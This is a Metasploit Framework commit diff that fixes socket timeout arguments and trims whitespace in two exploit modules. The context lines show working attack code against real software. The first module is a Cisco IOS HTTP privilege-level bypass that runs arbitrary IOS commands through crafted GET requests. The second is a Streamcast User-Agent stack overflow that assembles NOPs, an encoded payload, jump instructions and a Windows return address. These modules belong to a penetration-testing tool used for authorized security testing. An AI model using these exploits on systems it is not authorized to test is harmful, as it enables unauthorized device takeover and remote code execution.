Fix negative timeouts
git-svn-id: file:///home/svn/framework3/trunk@9048 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a3e92b2e75
commit
ee4528ed86
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco IOS HTTP Unauthorized Administrative Access',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Cisco IOS HTTP Server.
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Opt::RPORT(80),
|
||||
OptString.new('CMD', [ true, "Cisco IOS command", 'show start' ])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
sploit = "GET /level/" + level.to_s + "/exec/show%20privilege HTTP/1.0\r\n\r\n"
|
||||
sock.put(sploit)
|
||||
|
||||
result = sock.get(-1,-3)
|
||||
result = sock.get(-1, 3)
|
||||
disconnect
|
||||
|
||||
if (result =~ /Current privilege level is/)
|
||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
sploit = "GET /level/" + level.to_s + "/exec/" + xCMD + " HTTP/1.0\r\n\r\n"
|
||||
sock.put(sploit)
|
||||
|
||||
result = sock.get(-1,-3)
|
||||
result = sock.get(-1, 3)
|
||||
print_status(result.to_s)
|
||||
|
||||
disconnect
|
||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -135,4 +135,5 @@ Example Exploit:
|
|||
!
|
||||
[snip]
|
||||
|
||||
=end
|
||||
=end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Streamcast <= 0.9.75. By sending
|
||||
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.txt'],
|
||||
# [ 'BID', '' ], # No entry as yet
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
|
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested OK by patrick 20090225
|
||||
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
|
||||
|
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Jan 24 2008',
|
||||
'DefaultTarget' => 1))
|
||||
|
||||
register_options([ Opt::RPORT(8000) ], self)
|
||||
register_options([ Opt::RPORT(8000) ], self)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
res = sock.get(3, -1)
|
||||
res = sock.get(-1, 3)
|
||||
disconnect
|
||||
|
||||
if (res =~ /Steamcast\/0.9.75/)
|
||||
|
@ -80,9 +80,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
juju = "GET / HTTP/1.0\r\n"
|
||||
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
|
||||
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
|
||||
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
|
||||
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
|
||||
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
|
||||
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
|
||||
juju << rand_text_alpha_upper(275)
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
|
Loading…
Reference in New Issue